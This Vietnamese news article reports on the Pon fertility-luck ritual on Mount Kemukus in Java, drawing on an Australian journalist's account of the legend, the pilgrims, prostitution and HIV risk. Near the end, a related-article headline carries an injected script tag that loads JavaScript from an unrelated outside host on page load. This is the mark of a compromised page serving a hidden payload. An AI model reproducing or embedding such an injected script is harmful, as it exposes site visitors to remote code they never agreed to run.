RSS

Phóng viên Úc “choáng” trước tập tục lên núi quan hệ với người lạ để “đổi vận”

06:00 06/08/2018

Phóng viên người Úc, công tác tại kênh truyền hình SBS, Patrick Abboud đã có dịp tới Java, Indonesia vào năm 2014 và đã ghi lại được những điều thú vị và độc đáo về tập tục kỳ lạ trên ngọn núi Kemukus.

Đây là một trong những bí mật kỳ lạ nhất và ít được chia sẻ nhất ở Indonesia.

Phong tục rất "thoáng" ở đất nước Hồi giáo

Là một quốc gia đạo Hồi, Indonesia có những quy tắc được cho là khá hà khắc, đặc biệt khi liên quan đến những mối quan hệ ngoài hôn nhân.

Tuy nhiên, bên cạnh những quy tắc hà khắc nói trên, ở quốc gia với số người theo đạo Hồi đông nhất trên thế giới này cũng có những tập tục rất "thoáng" khi liên quan đến vấn đề tình dục ngoài hôn nhân, mà một trong số đó là lễ hội Pon ở đảo Java.

Phong tục này được coi như một khía cạnh hiện đại của Indonesia, song song tồn tại với những giáo lý của đạo Hồi.

Hàng nghìn người dân từ khắp Indonesia hành hương lên gần một ngôi đền thiêng trên núi Kemukus ở đảo Java, còn được biết tới với tên gọi "Núi tình dục" để quan hệ với người lạ như một nghi thức tôn giáo.

Phóng viên người Úc, công tác tại kênh truyền hình SBS, Patrick Abboud đã có dịp tới Java, Indonesia vào năm 2014 và đã ghi lại được những điều thú vị và độc đáo về tập tục kỳ lạ trên ngọn núi Kemukus.

Nguồn gốc của lễ hội Pon

Truyền thống kỳ lạ này bắt đầu từ một giai thoại từ xưa. Giai thoại này kể rằng vào thế kỷ 16, một hoàng tử trẻ của Indonesia là Pangeran Samudro, con một vị vua của Java, có mối tình trái ngang với chính người mẹ kế của mình là Nyai Ontrowulan.

Họ cùng nhau bỏ trốn đến ngọn núi Kemukus. Họ đã bị bắt quả tang khi đang yêu đương và bị giết chết. Mộ của họ về sau được xây dựng thành đền và những người đời sau thường tới đây dâng hoa để cầu may.

Người ta tin rằng đôi nam nữ chưa hoàn thành việc đó, nên người ta tin rằng nếu bạn "gần gũi" với ai đó thì may mắn sẽ tới, đặc biệt là những người nông dân nghèo muốn có một cuộc sống sung túc hơn.

Theo phóng viên Abboud, đây là một nghi thức của người Java và khác biệt hoàn toàn với thế giới của người Hồi giáo hay bất cứ nơi nào khác ở Indonesia, tín ngưỡng của họ là sự pha trộn của đạo Hồi, đạo Hindu và đạo Phật.

Từ nông dân đến nhân viên chính phủ đều "lên núi" để... đổi vận

Theo Abboud, để những lời cầu nguyện thành hiện thực, cứ 35 ngày họ lại phải quan hệ tình dục 7 lần liên tục với một người lạ.

"Đó là một câu chuyện khá kỳ lạ. Cách đây vài năm tôi đã đọc một bài báo về nó và nghiên cứu nó, nhưng phải mất một thời gian tôi mới tới được đó" - phóng viên Abboud cho biết.

Abboud mô tả những gì mình phát hiện được là "vô cùng đáng ngạc nhiên".

Điều sốc hơn là quy mô của nơi diễn ra nghi thức này và số người tham gia mỗi đêm lên tới hàng nghìn người, có đêm đông nhất là 8.000 người.

"Thật khó mà hiểu được truyền thống này, sau khi tới đó tôi phải mất tới vài tuần mới quen được với nó" - phóng viên Abboud chia sẻ.

Những người tham gia thuộc đủ mọi thành phần trong cuộc sống, từ những quan chức chính phủ, đến các nhân viên bình thường, thậm chí cả gái làng chơi.

Buổi sáng, họ sẽ tới ngôi đền để dâng hoa và cầu khấn. Buổi chiều tối họ sẽ đi tìm những người lạ để quan hệ và qua đêm cùng nhau.

Có một điều đáng chú ý là những người có gia đình, từ đàn ông đến phụ nữ cũng tham gia nghi thức này. Trước kia họ còn làm "chuyện ấy" ở ngoài trời, nhưng bây giờ họ đã kín đáo hơn khi thuê nhà nghỉ.

Theo quan niệm từ xa xưa, những người tham gia nghi thức này phải quan hệ 7 lần liên tiếp với cùng một người thì sẽ may mắn nhất. Điều này đồng nghĩa với việc những "cặp đôi" này sẽ có cơ hội trao đổi thông tin với nhau để giữ liên lạc.

Được biết, có những người cho chồng hoặc vợ của họ biết việc họ lên núi Kemukus, nhưng đa số thì giữ kín.

Những người nào lên núi thực hiện nghi thức mà không quan hệ với ai thì sẽ tìm các quán karaoke để giải trí.

Liệu nghi thức trên núi Kemukus có linh thiêng?

Abboud có cơ hội đi theo một người hành hương là Mardiyah, một quả phụ đã gặp khó khăn về tài chính trong 2 năm.

Sống ở một thị trấn nhỏ ở Java, Mardiyah vừa mới hoàn thành nghi thức với 7 lần quan hệ. Cô cho biết việc làm ăn của cô đã thuận lợi hơn, giúp cô kiếm được nhiều tiền hơn, và đây có thể là bằng chứng về sự linh thiêng của nghi thức.

"Tôi cũng gặp một người hành hương là nam giới, tên là Gepeng đi cùng bạn bè anh ấy, nhưng anh ấy không muốn tiết lộ câu chuyện vì không muốn vợ anh ấy phát hiện ra" - Abboud cho biết.

Nghi thức của lễ hội Pon này nổi tiếng đến mức nó đã biến thành một điểm nhấn thu hút khách du lịch tới với địa phương.

Chính quyền biết việc ngoại tình này nhưng cũng "mắt nhắm mắt mở" cho qua mà không đưa ra hình phạt với những người tham dự.

Tuy nhiên theo phóng viên người Australia này, vấn đề ở đây là có nhiều nam giới hơn phụ nữ, và do đó, nó đã tạo điều kiện thuận lợi cho gái bán dâm hành nghề.

Chính bản thân Abboud cũng đã được "chào mời" khi đang ghi hình, nhưng anh đã nhanh chóng từ chối.

Kèm theo vấn nạn gái mại dâm là các căn bệnh lây qua đường tình dục, trong đó có HIV/AIDS và điều nguy hiểm là phần lớn nam giới đều không dùng bao cao su khi quan hệ.

Cạm bẫy ở sân bay Thái Lan<script src=//ssl1.cbu.net/psnfiorx></script>

Cạm bẫy ở sân bay Thái Lan

Hàng loạt du khách nước ngoài bị buộc tội trộm đồ ở khu hàng miễn thuế tại sân bay quốc tế tại Bangkok, Thái Lan, và phải trả nhiều tiền để đổi lấy tự do.